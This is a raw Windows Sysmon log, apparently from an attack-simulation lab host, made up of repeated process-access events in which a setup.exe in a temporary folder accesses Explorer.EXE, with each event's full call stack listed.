13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015321Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015320Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015319Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015318Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015317Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015316Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015315Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015314Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015313Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015312Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015311Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015310Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.521{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+